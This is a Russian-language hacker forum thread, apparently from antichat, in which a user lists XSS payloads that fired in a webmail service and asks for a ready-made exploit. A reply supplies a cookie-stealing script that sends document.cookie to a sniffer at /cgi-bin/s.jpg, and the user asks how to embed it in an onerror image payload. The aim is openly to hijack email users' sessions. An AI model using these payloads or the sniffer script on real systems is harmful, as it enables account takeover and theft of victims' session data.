привет вот ротестил одно мыло хсс тестером проверил мыло эти дали алерт <image src="" onerror=alert(8)> <image src='' onerror=alert(9)> <img src="" onerror=alert(10)> <span sss="alert(21);this.sss=null" style=top:expression(eval(this.sss));></span> <span sss='alert(22);this.sss=null' style=top:expression(eval(this.sss));></span> <span sss=alert(23);this.sss=null style=top:expression(eval(this.sss));></span> <style type="text/css">@import url(vbscript:alert(38));</style> тепер используя это что мне отправит чтобы внедрить antichat.ru/cgi-bin/s.jpg плз ес можете дайте готовый сплоит или чо то в этом роде
Ни кто не отвечает? слишком уж изЪеженная эта тема про Xss и на форуме можно найти все что надо . Главное пользоватся поиском=) А на каком почтовике находится мыло???
эм.... Code: # Простой вызов по ссылке: <a href="/cgi-bin/s.jpg?it is test">click me</a> # Вызов как картинки: <img src="/cgi-bin/s.jpg"> # Вызов из скрипта: <script>img = new Image(); img.src = "/cgi-bin/s.jpg?"+document.cookie;</script> /sniff/
ок тепер где надо вставит это : <script>img = new Image(); img.src = "/cgi-bin/s.jpg?"+document.cookie;</script> в этом <img src="" onerror=alert(10)> thank